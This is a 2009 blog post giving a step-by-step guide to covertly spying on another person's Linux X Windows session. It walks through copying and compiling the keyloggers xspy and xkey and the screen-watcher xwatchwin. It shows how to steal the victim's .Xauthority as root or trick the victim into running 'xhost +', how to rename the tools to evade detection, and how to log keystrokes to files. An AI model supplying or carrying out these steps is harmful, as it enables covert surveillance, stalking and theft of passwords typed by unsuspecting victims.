The Barcode Reader

Just another weblog

How to secretly watch a user in X Windows

leave a comment »

Let’s assume that you want to know what a particular user is doing on his computer while running some form of Linux and the X Window environment. Let’s further assume that you want to do so secretly, and that you have root access to the machine in question. If you don’t have root access then you need at least a local account on the machine and some social engineering skills. I’ll explain in a minute.

With root access there are probably several other options available which I won’t go into here. One approach that might work is x11vnc which connects to the X Window console using the VNC protocol. I haven’t tried this yet and I can make no guarantees that this approach can not be easily detected by the victim of your little espionage.

Obtaining the tools

xwatchwin.tar.gz   (watch any window on the victim’s display)

xspy.tar.gz   (keylogger)

xkey.c   (another keylogger)

The reason why I have included two keyloggers is that both have strenghts and weaknesses. While xspy sometimes misses keystrokes if the user is typing really fast, xkey fails to register keystrokes which are typed in secured fields like the kdesu dialog box. Take your pick or use them both.

Copy the files to the victim’s computer:

$ scp xwatchwin.tar.gz xspy.tar.gz xkey.c

where „yourname“ is either root or your account on the victim’s machine. Now log on and extract the files:

$ ssh -X -Y
$ tar -xvzf xwatchwin.tar.gz; tar -xvzf xspy.tar.gz


Next you need to compile these little programs.  Let’s start with xwatchwin:

$ xmkmf
$ make

This will give you the compiled binary xwatchwin. The program xspy is a littly trickier. At least on my machine compiling it generates an error in usleep.c: ‚NULL‘ undeclared. So first edit the file usleep.c by adding a line at the beginning:

$ echo '#define NULL 0' >tmp
$ cat usleep.c >>tmp
$ mv tmp usleep.c
$ xmkmf
$ make

This will result in the compiled binary xspy. Finally compile xkey.c:

$ gcc -o xkey xkey.c -lX11 -lm -L/usr/X11R6/lib/

Getting access to the victim’s display

A quick test with

$ xdpyinfo -display :0

will probably give you an error message. If you are logged in as root then the fix is easy:
$ cat /home/victim/.Xauthority >>~/.Xauthority

Replace „victim“ with the login name of the user running the X Window session. Now try the test again, it should run without errors.

If you are not logged in as root then you’ll have to convince your victim to enable local access to the display by making him type 
$ xhost local:

or alternatively

$ xhost +

into a terminal window. This is where your social engineering skills come in. Nowadays most Linux distributions start the X11 server with the -nolisten tcp  flag enabled. This protects the local display from access over the network, even after all access control has been disabled with xhost +. In previous days this simple command made it possible to spy on somebody remotely without the need for a local account, let alone root access. Some systems reportedly even shipped with xhost + as the default setting. Ah, the good old days.

Start watching

Before you run these programs I highly recommend that you rename them to something inconspicuous like „screen“ or anything that wouldn’t raise suspicion in a process listing. For clarity I will use the original name.

First start the keyloggers. Try xspy -help for a short list of command line options. To watch what the victim is typing in real time use one of these commands:

$ xspy -display :0
$ xkeys :0

For best results run them both concurrently and redirect the output to a file:

$ xspy -display :0 >~/log1 &
$ xkeys :0 >~/log2 &

Now let’s watch what is happening on the victim’s display or in a particular window. xwatchwin comes with its own man page in the xwatchwin directory.

$ man -l

The program requires a window name or window id. To get a full listing of all windows and their corresponding window ids use the command

$ xwininfo -display :0 -root -children

The root window, which corresponds to the whole display as seen by the victim, has no name, so you need to find its window id in the output of the xwininfo command. Then start xwatchwin using this rootID:

$ xwatchwin :0 -w rootID

You can use xwatchwin with the -u option to specify how often (in seconds) the image of the watched window will be redrawn. A longer interval results in a lower load on the victim’s machine.


Written by barcodereader

Februar 19, 2009 um 8:50 pm

Veröffentlicht in Linux, X Windows

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

Du kommentierst mit deinem Abmelden /  Ändern )


Du kommentierst mit deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s

%d Bloggern gefällt das: